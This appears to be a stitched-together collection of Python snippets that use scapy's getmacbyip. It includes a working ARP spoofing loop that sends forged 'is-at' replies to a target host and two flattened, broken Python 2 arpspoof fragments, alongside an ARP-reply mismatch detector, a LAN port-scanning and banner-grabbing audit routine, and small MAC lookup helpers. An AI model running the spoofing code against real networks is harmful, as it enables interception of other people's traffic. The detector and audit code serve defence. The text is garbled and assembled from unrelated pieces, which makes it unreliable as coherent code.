# binding and are what ARP inspection / ARP-watch style monitoring reports.
# The cleanup step means the cache may look normal afterwards, so detection
# depends on logging while it happens.
if __name__ == '__main__':
    if len(sys.argv) < 3:
        sys.exit(1)
    target_ip = sys.argv[1]
    host = sys.argv[2]
    # Either lookup may return None when it gets no answer.
    target_mac = getmacbyip(target_ip)
    host_mac = getmacbyip(host)
    pkt = Ether() / ARP(
        op='is-at', psrc=host, pdst=target_ip, hwdst=target_mac)
    print(pkt.show())
    try:
        # loop=1 with inter=2: resend every two seconds until interrupted.
        sendp(pkt, inter=2, loop=1)
    except KeyboardInterrupt:
        print('Cleaning...')
        # Announce the host's resolved MAC three times, one second apart.
        sendp(Ether(src=host_mac) / ARP(op='is-at', psrc=host, hwsrc=host_mac, pdst=target_ip, hwdst=target_mac), inter=1, count=3)
import os import sys from scapy.layers.l2 import getmacbyip from scapy.all import ( Ether, ARP, sendp ) ifconfig=os.system('ifconfig') print ifconfig gmac=raw_input('Please enter gateway IP:') liusheng=raw_input('Please enter your IP:') liusrc=raw_input('Please enter target IP:') try: tg=getmacbyip(liusrc) print tg except Exception , f: print '[-]{}'.format(f) exit() def arpspoof(): try: eth=Ether() arp=ARP( op="is-at", hwsrc=gmac, psrc=liusheng, hwdst=tg, pdst=liusrc ) print ((eth/arp).show())
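def check_ip_mac(packet):
    """Return True when an ARP reply's sender MAC disagrees with a fresh lookup.

    For an ARP reply (``op == 2``) the sender IP is resolved again with
    ``getmacbyip`` and compared with the sender MAC in the packet.

    Changes from the previous version:

    - Packets without an ARP layer, and ARP packets that are not replies,
      return ``False`` explicitly (previously an exception and an implicit
      ``None``, respectively).
    - The MAC comparison ignores letter case.
    - An unresolved lookup is handled explicitly and still counts as a
      mismatch, because the binding could not be confirmed.

    Caveat for deployment: ``getmacbyip`` learns its answer from ARP on the
    same segment (and may serve it from scapy's cache), so a host that is
    still forging replies can answer that lookup too. A trusted reference
    such as a static binding table or the switch's DHCP snooping database
    gives a stronger check.

    Args:
        packet: A scapy packet, normally from a sniffer callback.

    Returns:
        bool: True if the reply looks inconsistent, False otherwise.
    """
    if ARP not in packet or packet[ARP].op != 2:
        return False
    proposed_IP = packet[ARP].psrc
    claimed_mac = packet[ARP].hwsrc
    resolved_mac = getmacbyip(proposed_IP)
    if resolved_mac is None:
        # Nothing answered for the claimed IP: cannot verify, so flag it.
        return True
    return resolved_mac.lower() != str(claimed_mac).lower()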
from scapy.layers.l2 import getmacbyip from scapy.all import ( Ether, ARP, sendp ) #执行查看IP的命令 ifconfig=os.system('ifconfig') print ifconfig gmac=raw_input('Please enter gateway IP:') liusheng=raw_input('Please enter your IP:') liusrc=raw_input('Please enter target IP:') try: #获取目标的mac tg=getmacbyip(liusrc) print tg except Exception , f: print '[-]{}'.format(f) exit() def arpspoof(): try: eth=Ether() arp=ARP( op="is-at", #arp响应 hwsrc=gmac, #网关mac psrc=liusheng,#网关IP hwdst=tg,#目标Mac pdst=liusrc#目标IP ) #对配置进行输出
def _scapy_ip(ip):
    """Resolve ``ip`` to a MAC address through scapy.

    Requires root permissions on POSIX platforms. Windows does not have
    this limitation.
    """
    # Imported lazily so scapy is only loaded when this backend is used.
    from scapy.layers import l2
    return l2.getmacbyip(ip)
def local_scan():
    """Audit the local network: find hosts, scan ports, report services.

    Steps, as visible in the code:

    1. Determine the local IP and abort if it is not a local-network
       address.
    2. Build the host list according to ``config.ip_list_setting``:
       3 = every address in the last octet range, 2 = the manual list,
       anything else = a ping sweep.
    3. Port-scan every host with ``multithread_scan``.
    4. For each host, resolve the MAC, reverse-resolve the name, look up
       the vendor and collect the open ports, then print a table.
    5. If any open ports were found, list the services and grab banners.

    Nothing is returned; all output goes to stdout.
    """
    ipl = get_lan_ip()  # Local IP
    print('\nYour local IP is: {}'.format(ipl))
    if ip_check_local(ipl) is False:
        print('Your address does not appear to be from a local network. Aborting scan.')
    else:
        x = config.ip_list_setting
        if x == 3:
            print('Skipping ping sweep.')
            print('Scanning all IPs in the last IP octet range (like in a /24 subnet).')
            ip_list = generate_ips(ipl)
        elif x == 2:
            print('Skipping ping sweep.')
            print('Scanning manually entered IPs.')
            ip_list = config.manual_ip_list
        else:
            print('Ping sweeping the IPs in the last IP octet range (like in a /24 subnet).')
            ip_list = ping_sweep.get_ip_list(ipl)
            print(ip_list)
        data_list = []
        open_ports_found = False
        open_ports = []
        print('Scanning for open ports on found hosts...')
        ports_by_ip = multithread_scan(ip_list, port_scan)
        print('Acquiring host data...')
        start_time = time.time()
        for address in ip_list:
            # str() turns an unresolved lookup (None) into the text 'None'.
            mac_addr = str(getmacbyip(address))  # TODO this needs a timeout for optimisation
            # This means host was unresponsive
            # It only matters when skipping ping sweep
            if mac_addr == 'None':
                continue
            # NOTE(review): gethostbyaddr raises socket.herror when the
            # address has no reverse DNS record, and nothing here catches
            # it. One such host would abort the whole scan.
            host_data = socket.gethostbyaddr(address)
            hostname = host_data[0]  # host_data structure is: (name, aliases, [IPs])
            vendor = mac_vendor.get_str(mac_addr)
            ports = get_ports(address, ports_by_ip)
            ports.sort()
            ip_data = [
                address,
                hostname,
                ports,
                mac_addr,
                vendor
            ]
            data_list.append(ip_data)
        print("Duration: {} seconds".format(time.time() - start_time))
        # TODO sort the data_list
        print('\nNote: Your host might return ff:ff:ff:ff:ff:ff.\n')
        # Display hosts with found ports
        print("{:<15} {:<20} {:<20} {:<35} {}".format('IP', 'Name', 'MAC', 'Vendor', 'List of open ports'))
        print("{:<15} {:<20} {:<20} {:<35} {}".format('-'*15, '-'*16, '-'*17, '-'*30, '-'*18))
        for entry in data_list:
            # entry layout: [address, hostname, ports, mac_addr, vendor]
            print("{:<15} {:<20} {:<20} {:<35} {}".format(entry[0], entry[1], entry[3], entry[4], entry[2]))
            if len(entry[2]) != 0:
                open_ports_found = True
                # Collect the distinct ports seen across all hosts.
                for port in entry[2]:
                    if port not in open_ports:
                        open_ports.append(port)
        if open_ports_found:
            print('\nPorts belonging to potentially vulnerable services have been found on one or more of\n'
                  'the devices in your local network. Make sure to investigate and close or secure them.')
            open_ports.sort()
            print('\nThe services on those ports are:')
            for port in open_ports:
                print('─ {} ({})'.format(port, services.get(port)))
        else:
            print('\nNo ports belonging to potentially dangerous services have been found.')
        if open_ports_found:
            # The prompt is disabled, so banner grabbing always runs.
            decision = 'Y'  # input('Grab banners? Enter Y or n \n')
            if decision == 'Y':
                print('Grabbing banners for all services. This might take a minute...')
                banner_data = multithread_scan(ports_by_ip, banner_grab)
                #pprint.pprint(banner_data)
                for row in banner_data:
                    # row layout: (ip_address, [(port, banner), ...])
                    ip_address = row[0]
                    host_data = socket.gethostbyaddr(ip_address)
                    hostname = host_data[0]
                    banner_by_port_list = row[1]
                    print('{} ({})'.format(ip_address, hostname))
                    for entry in banner_by_port_list:
                        port = entry[0]
                        banner = entry[1]
                        print('\tPort: {}'.format(port))
                        # NOTE(review): banners are bytes chosen by the
                        # remote service and are printed as received.
                        # Consider stripping control characters first so a
                        # device cannot inject terminal escape sequences.
                        print('\t\t{}'.format(banner))
def main():
    """Print the MAC address that scapy resolves for 192.168.56.16."""
    # sniff(filter='icmp', prn=prn)
    resolved = getmacbyip('192.168.56.16')
    print(resolved)
def get_mac(tgt_ip):
    """Return the MAC address scapy resolves for ``tgt_ip``.

    When ``getmacbyip`` yields ``None``, a notice is printed and ``None``
    is returned.
    """
    mac = getmacbyip(tgt_ip)
    if mac is None:
        print("无法获取IP为:%s 主机的MAC地址,请检查目标IP是否存活" % tgt_ip)
        return None
    return mac
def getway():
    """Return ``(gateway_ip, gateway_mac)`` for the default gateway.

    The gateway is read from ``netifaces.gateways()["default"][2]``; key 2
    is presumably ``netifaces.AF_INET`` (verify on the target platform).
    The MAC comes from ``getmacbyip`` and is ``None`` when the lookup gets
    no answer.
    """
    default_entry = netifaces.gateways()["default"][2]
    gateway_ip = default_entry[0]
    gateway_mac = getmacbyip(gateway_ip)
    return gateway_ip, gateway_mac